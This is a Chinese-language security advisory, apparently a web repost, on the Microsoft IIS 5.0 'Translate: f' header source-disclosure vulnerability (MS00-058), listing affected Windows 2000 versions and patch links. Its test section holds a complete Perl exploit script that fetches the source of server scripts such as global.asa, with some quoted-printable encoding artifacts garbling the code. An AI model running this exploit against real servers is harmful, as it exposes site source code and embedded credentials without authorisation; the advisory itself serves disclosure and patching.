Microsoft IIS 5.0

2008-04-09 04:35:54来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Microsoft IIS 5.0 "Translate: f"头标记导致源码泄露漏洞(MS00-058)

发布日期:2000-08-14
更新日期:2000-08-14

受影响系统:
Microsoft IIS 5.0
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server
描述:
BUGTRAQ ID: 1578
CVE(CAN) ID: CVE-2000-0778

IIS是Microsoft公司开发的流行的HTTP服务器程序,随同Windows操作系统捆绑发布。

IIS 5.0在处理某些带有特殊标记的HTTP请求时存在漏洞,远程攻击者可能利用此漏洞得到服务器上脚本的源码。

如果IIS 5.0接收到一个包含特殊头格式(Translate: f)的HTTP请求,同时URL末尾包含一个特殊字符("/")的话,IIS 会错误得调用脚本处理引擎,可能导致文件源码泄漏给远程用户。


<*来源:Daniel Docekal (ddoc@MIA.CZ)

链接:http://archives.neohapsis.com/archives/ntbugtraq/2000-q3/0080.html
http://www.ciac.org/ciac/bulletins/k-065.shtml
http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

smiler@vxd.org提供了如下测试代码:

#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with sucess against IIS 5.0. Maybe it works against IIS 4.0 =
using a shared drive but I haven=B4t tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in =
BugTraq.
# Cheers 351 and FractalG :)

if (not $ARGV[0]) {
print qq~
Geee it=B4s running !! kewl :)))
Usage : srcgrab.pl <complete url of file to retrieve>
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl =
http://www.victim.com/default.asp > file_to_save
~; exit;}


$victimurl=3D$ARGV[0];

# Create a user agent object
use LWP::UserAgent;
$ua =3D new LWP::UserAgent;

# Create a request
my $req =3D new HTTP::Request GET =3D> $victimurl . '\\'; # Here =
is the backslash at the end of the url ;)
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate =3D> 'f'); # Here is the famous translate =
header :))
$req->content('match=3Dwww&errors=3D0');

# Pass request to the user agent and get a response back
my $res =3D $ua->request($req);

# Check the outcome of the response
if ($res->is_success) {
print $res->content;
} else {
print $res->error_as_HTML;
}

建议:
厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS00-058)以及相应补丁:
MS00-058:Patch Available for "Specialized Header" Vulnerability
链接:http://www.microsoft.com/technet/security/bulletin/MS00-058.asp

补丁下载:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23769

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Microsoft Office 2000 HTML对象标记缓冲区溢出漏洞

下一篇:SuidPerl调用/bin/mail漏洞